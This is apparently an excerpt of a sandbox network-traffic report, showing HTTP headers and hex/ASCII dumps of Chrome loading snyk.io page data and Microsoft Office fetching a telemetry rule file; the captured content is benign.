                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000023-10-10T23:22:08.960Z","updatedAt":"2024-07-18T21:34:06.130Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":13,"revision":3,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"mo
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC8204INData Raw: 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 63 6f 64 65 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 63 75 72 6c 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 20 69 6e 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 63 75 72 6c 2e 73 65 2f 64 6f 63 73 2f 76 75 6c 6e 65 72 61 62 69 6c 69 74 69 65 73 2e 68 74 6d 6c 22 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 75 6e 64 65 72 6c 69 6e 65
                                                                                                                                                                                                                                                                                                              Data Ascii: "nodeType":"text"},{"data":{},"marks":[{"type":"code"}],"value":"curl","nodeType":"text"},{"data":{},"marks":[],"value":" in ","nodeType":"text"},{"data":{"uri":"https://curl.se/docs/vulnerabilities.html"},"content":[{"data":{},"marks":[{"type":"underline
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 22 63 6f 64 65 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 63 75 72 6c 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 20 6d 61 69 6e 74 61 69 6e 65 72 73 20 68 61 76 65 20 62 65 65 6e 20 76 6f 63 61 6c 20 61 62 6f 75 74 20 64 6f 77 6e 70 6c 61 79 69 6e 67 20 74 68 65 20 72 69 73 6b 20 61 73 73 6f 63 69 61 74 65 64 20 77 69 74 68 20 6d 6f 73 74 20 76 75 6c 6e 65 72 61 62 69 6c 69 74 69 65 73 20 72 65 70 6f 72 74 65 64 20 61 67 61 69 6e 73 74 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 63 6f 64 65 22 7d 5d 2c 22 76 61
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000"code"}],"value":"curl","nodeType":"text"},{"data":{},"marks":[],"value":" maintainers have been vocal about downplaying the risk associated with most vulnerabilities reported against ","nodeType":"text"},{"data":{},"marks":[{"type":"code"}],"va
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC12INData Raw: 22 53 70 61 63 65 22 2c 22 69 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: "Space","i
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 70 46 6f 34 6a 44 53 42 30 44 6d 4f 47 4f 63 76 4c 6f 48 77 31 56 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 30 39 2d 32 30 54 32 33 3a 31 39 3a 30 33 2e 35 38 39 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 31 30 2d 31 31 54 31 38 3a 32 34 3a 30 30 2e 38 34 32 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 33 30 2c 22 72 65
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000d":"oyrbri43adzz"}},"id":"pFo4jDSB0DmOGOcvLoHw1V","type":"Entry","createdAt":"2022-09-20T23:19:03.589Z","updatedAt":"2023-10-11T18:24:00.842Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":30,"re
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC12INData Raw: 45 6e 67 69 6e 65 20 75 73 65 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: Engine use
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 64 20 66 6f 72 20 63 72 65 61 74 69 6e 67 20 32 44 20 61 6e 64 20 33 44 20 67 61 6d 65 73 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 67 6f 64 6f 74 65 6e 67 69 6e 65 2f 67 6f 64 6f 74 2f 63 6f 6d 6d 69 74 2f 32 35 32 39 61 64 36 61 36 34 32 37 61 32 37 66 34 37 63 31 65 66 38 63 65 32 61 61 63 36 30 38 66 36 63 32 30 65 64 38 22 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 75 6e 64 65 72 6c 69 6e 65 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 64 65 70 65 6e 64 73 20 6f 6e 20 74 68 65 20 6c 69 62 77 65 62 70 20 6c 69 62 72 61
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000d for creating 2D and 3D games ","nodeType":"text"},{"data":{"uri":"https://github.com/godotengine/godot/commit/2529ad6a6427a27f47c1ef8ce2aac608f6c20ed8"},"content":[{"data":{},"marks":[{"type":"underline"}],"value":"depends on the libwebp libra
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC8204INData Raw: 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 30 37 2d 31 39 54 31 38 3a 30 38 3a 32 39 2e 37 35 37 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 31 30 2d 30 32 54 31 35 3a 35 37 3a 35 35 2e 30 39 35 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 31 35 30 39 2c 22 72 65 76 69 73 69 6f 6e 22 3a 39 35 33 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79
                                                                                                                                                                                                                                                                                                              Data Ascii: ry","createdAt":"2022-07-19T18:08:29.757Z","updatedAt":"2024-10-02T15:57:55.095Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":1509,"revision":953,"contentType":{"sys":{"type":"Link","linkType":"ContentTy


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              114192.168.2.54988313.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:13 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 428
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: b11d926e-c01e-00a2-50f4-242327000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194913Z-r197bdfb6b4kq4j5t834fh90qn0000000bk000000000391k
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              115192.168.2.54987723.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC447OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform/deepcode-ai.json?slug=platform&slug=deepcode-ai HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC632INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"si2iupeg0t19ob"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform/deepcode-ai.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::b26hc-1729799353611-526711a1d721
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:13 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799353.1095a9a
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC15752INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 35 53 75 49 56 74 77 38 39 57 41 38 6b 45 6e 5a 6e 34 69 51 57 38 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 36 2d 30 37 54 31 33 3a 31 37 3a 33 37 2e 31 34 33 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 31 30 2d 30 38 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5SuIVtw89WA8kEnZn4iQW8","type":"Entry","createdAt":"2023-06-07T13:17:37.143Z","updatedAt":"2024-10-08T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC8836INData Raw: 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 36 38 36 31 34 32 34 36 34 2f 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 75 69 2d 73 70 6f 74 2d 73 6e 79 6b 2d 64 65 65 70 63 6f 64 65 2d 73 65 61 72 63 68 2d 72 75 6c 65 73 2e 70 6e 67 22 2c 22 74 61 67 73 22 3a 5b 5d 2c 22 74 79 70 65 22 3a 22 75 70 6c 6f 61 64 22 2c 22 62 79 74 65 73 22 3a 33 31 35 36 36 35 2c 22 77 69 64 74 68 22 3a 31 32 33 38 2c 22 66 6f 72 6d 61 74 22 3a 22 70 6e 67 22 2c 22 68 65 69 67 68 74 22 3a 37 39 32 2c 22 76 65 72 73 69 6f 6e 22 3a 31 36 38 36 31 34 32 34 36 34 2c 22 64 75 72 61 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 6d 65 74 61 64 61 74 61 22 3a 5b 5d 2c 22 70 75 62 6c 69 63 5f 69 64 22 3a 22 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 75 69 2d 73 70 6f 74 2d 73 6e 79
                                                                                                                                                                                                                                                                                                              Data Ascii: m/snyk/image/upload/v1686142464/illustration-ui-spot-snyk-deepcode-search-rules.png","tags":[],"type":"upload","bytes":315665,"width":1238,"format":"png","height":792,"version":1686142464,"duration":null,"metadata":[],"public_id":"illustration-ui-spot-sny
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 36 2d 30 37 54 31 33 3a 31 37 3a 33 38 2e 33 37 32 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 31 38 54 32 32 3a 33 32 3a 33 35 2e 37 37 30 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 33 37 2c 22 72 65 76 69 73 69 6f 6e 22 3a 38 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000type":"Entry","createdAt":"2023-06-07T13:17:38.372Z","updatedAt":"2024-07-18T22:32:35.770Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":37,"revision":8,"contentType":{"sys":{"type":"Link","link
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC8204INData Raw: 22 3a 22 36 50 76 36 61 64 47 4f 57 6e 74 33 62 58 5a 6d 35 72 42 76 63 31 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 52 65 73 6f 75 72 63 65 20 6c 69 62 72 61 72 79 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 75 72 6c 22 3a 22 2f 72 65 73 6f 75 72 63 65 2d 6c 69 62 72 61 72 79 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 6c 69 62 72 61 72 79 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 7a 32 57 70 47 4e 55 42 62 71 48 50 39 5a 43 74 50 4b 30 38 73 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53
                                                                                                                                                                                                                                                                                                              Data Ascii: ":"6Pv6adGOWnt3bXZm5rBvc1","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Resource library","description":null,"url":"/resource-library/","appearance":{"navItem":{"icon":"library"}}},{"sys":{"id":"3z2WpGNUBbqHP9ZCtPK08s","__typename":"S
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC10084INData Raw: 30 30 30 30 32 37 35 38 0d 0a 7d 7d 5d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 31 6b 4e 50 62 33 57 4c 6b 79 37 64 6f 71 35 41 43 76 50 5a 63 39 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 22 2c 22 72 6f 77 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 79 48 34 42 6f 62 71 54 6f 6d 4c 30 35 70 77 67 67 32 62 32 49 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74
                                                                                                                                                                                                                                                                                                              Data Ascii: 00002758}}]}},{"sys":{"id":"1kNPb3WLky7doq5ACvPZc9","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumn","rows":{"__typename":"NavigationDropdownMenuColumnRowsCollection","items":[{"sys":{"id":"3yH4BobqTomL05pwgg2b2I","__typename":"Sys"},"__t
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              116192.168.2.54987823.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC634OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/security-leaders.json?slug=security-leaders HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"8gq5k9cing15qr"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/[...slug].json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::t2kg7-1729799353637-325fbc947532
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:13 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799353.1f614a0
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC15763INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 35 54 31 38 43 35 4e 6b 56 6c 43 51 59 6f 67 47 54 6d 44 34 68 4b 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 32 2d 31 33 54 30 31 3a 31 38 3a 34 30 2e 33 34 37 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 36 2d 30 38 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5T18C5NkVlCQYogGTmD4hK","type":"Entry","createdAt":"2022-12-13T01:18:40.347Z","updatedAt":"2023-06-08T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:14 UTC15985INData Raw: 20 41 63 74 69 76 65 43 61 6d 70 61 69 67 6e e2 80 99 73 20 56 50 2c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 63 75 72 69 74 79 22 2c 22 75 72 6c 22 3a 22 2f 62 6c 6f 67 2f 73 65 63 75 72 69 6e 67 2d 63 6c 6f 75 64 2d 6e 61 74 69 76 65 2d 61 70 70 6c 69 63 61 74 69 6f 6e 73 2d 61 63 74 69 76 65 63 61 6d 70 61 69 67 6e 73 2d 76 70 2d 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 73 65 63 75 72 69 74 79 2d 70 72 6f 76 69 64 65 73 2d 70 65 72 73 70 65 63 74 69 76 65 2f 22 2c 22 6c 69 6e 6b 4c 61 62 65 6c 22 3a 22 52 65 61 64 22 7d 7d 2c 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c
                                                                                                                                                                                                                                                                                                              Data Ascii: ActiveCampaigns VP, Information Security","url":"/blog/securing-cloud-native-applications-activecampaigns-vp-information-security-provides-perspective/","linkLabel":"Read"}},{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","l
